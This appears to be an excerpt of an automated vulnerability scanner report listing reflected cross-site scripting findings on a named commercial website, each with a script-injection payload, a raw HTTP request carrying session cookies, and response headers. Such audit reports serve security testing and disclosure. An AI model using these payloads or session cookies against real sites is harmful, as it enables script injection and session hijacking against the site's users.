GET /product35d1b--><script>alert(1)</script>538a51777cb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.473. http://www.splunk.com/product [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /product
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35e00--><script>alert(1)</script>f5599213e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product?35e00--><script>alert(1)</script>f5599213e69=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:19:57 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload dd2d6--><script>alert(1)</script>2a06c6fb131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /searchdd2d6--><script>alert(1)</script>2a06c6fb131/docs HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload b1f41--><script>alert(1)</script>ce21d9d0fac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/docsb1f41--><script>alert(1)</script>ce21d9d0fac HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fad1"><script>alert(1)</script>d4904b444f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/docs3fad1"><script>alert(1)</script>d4904b444f2 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.477. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/search/docs
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d7f95--><script>alert(1)</script>603aa4eab3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/docs?d7f95--><script>alert(1)</script>603aa4eab3b=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.478. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/search/docs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2d1"><script>alert(1)</script>d8e75fd0476 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/docs?ca2d1"><script>alert(1)</script>d8e75fd0476=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4129f--><script>alert(1)</script>3de290fb327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services4129f--><script>alert(1)</script>3de290fb327 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:23:59 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.480. http://www.splunk.com/services [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/services
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b461c--><script>alert(1)</script>18e83a6bdce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services?b461c--><script>alert(1)</script>18e83a6bdce=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:22:37 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fe6cc--><script>alert(1)</script>c05cba58d3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /solutionsfe6cc--><script>alert(1)</script>c05cba58d3a HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.482. http://www.splunk.com/solutions [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/solutions
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a5da2--><script>alert(1)</script>57c09440f05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /solutions?a5da2--><script>alert(1)</script>57c09440f05=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:21:33 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7a3f9--><script>alert(1)</script>3b8b3300f42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support7a3f9--><script>alert(1)</script>3b8b3300f42 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.484. http://www.splunk.com/support [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/support
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26060--><script>alert(1)</script>1685cc03ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support?26060--><script>alert(1)</script>1685cc03ca5=1 HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:20:06 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
